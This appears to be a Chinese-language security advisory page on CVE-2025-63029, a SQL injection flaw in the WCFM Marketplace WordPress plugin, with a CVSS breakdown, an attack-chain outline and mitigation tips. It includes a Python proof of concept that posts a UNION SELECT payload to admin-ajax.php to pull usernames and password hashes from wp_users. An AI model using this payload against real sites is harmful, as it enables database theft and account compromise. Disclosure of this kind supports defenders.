IPBUF安全漏洞报告
English
CVE-2025-63029 CVSS 7.6 高危

CVE-2025-63029 WCFM Marketplace SQL注入漏洞

披露日期: 2026-04-15

漏洞信息

漏洞编号
CVE-2025-63029
漏洞类型
SQL注入
CVSS评分
7.6 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
WC Lovers WCFM Marketplace

相关标签

SQL注入WordPressWCFM Marketplace高危漏洞CVE-2025-63029

漏洞概述

WCFM Marketplace插件存在严重的SQL注入漏洞,起因是对用户输入的特殊元素中和不当。该漏洞允许拥有高权限的攻击者通过恶意构造的SQL语句查询数据库,从而窃取敏感信息。此问题影响所有3.7.1及以下版本。鉴于该插件在WordPress多供应商市场中的普及度,此漏洞对电商平台的数据保密性构成重大风险,管理员应立即采取修复措施。

技术细节

该漏洞位于WCFM Marketplace插件的数据库交互层,核心原因是未能正确中和用于SQL命令的特殊元素。在处理特定业务逻辑(如订单查询、产品检索或报表生成)时,应用程序直接将用户可控的输入参数拼接至SQL查询语句中,未使用预处理语句或严格的类型检查。根据CVSS向量分析,利用该漏洞需要具备高权限(PR:H),即攻击者通常需要先获取商家或管理员账户权限。攻击者可通过发送特制的HTTP请求(如修改AJAX参数),注入恶意SQL代码。利用成功后,可导致数据库敏感信息泄露(C:H),如用户凭证、交易记录等。尽管未赋予完整性修改权限,但由于作用域为可改变(S:C),攻击者可能利用泄露的信息横向移动。

攻击链分析

STEP 1
侦察
攻击者识别目标网站使用的是WCFM Marketplace插件,且版本在3.7.1及以下。
STEP 2
获取权限
由于漏洞需要高权限(PR:H),攻击者通过钓鱼、社交工程或其他漏洞获取一个商家或管理员账户的凭证。
STEP 3
构造载荷
攻击者分析插件代码或逻辑,确定存在SQL注入的参数,并构造恶意的SQL注入Payload(如UNION SELECT查询)。
STEP 4
发送请求
攻击者使用获取的高权限Cookie,向存在漏洞的后台接口(如AJAX处理端点)发送包含恶意Payload的HTTP请求。
STEP 5
数据窃取
服务器执行恶意SQL语句,将数据库中的敏感信息(如用户密码哈希、API密钥等)返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "https://example.com/wp-admin/admin-ajax.php" # Attacker cookies (High privilege session required) cookies = { "wordpress_logged_in_xxx": "..." } # SQL Injection Payload (Example) # Adjust the parameter 'wcfm_product_id' based on the vulnerable endpoint payload = { "action": "wcfm_ajax_controller", "controller": "wcfm-products", "wcfm_product_id": "1 UNION SELECT 1,2,3,4,concat(user_login,0x7c,user_pass),6 FROM wp_users-- -" } response = requests.post(target_url, data=payload, cookies=cookies) if "admin" in response.text: print("[+] Vulnerability confirmed!") print(response.text) else: print("[-] Exploit failed or not vulnerable.")

影响范围

WC Lovers WCFM Marketplace <= 3.7.1

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用WCFM Marketplace插件,并严格限制后台管理账户的访问来源IP,仅允许可信的管理员登录,同时加强对数据库异常查询的监控。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表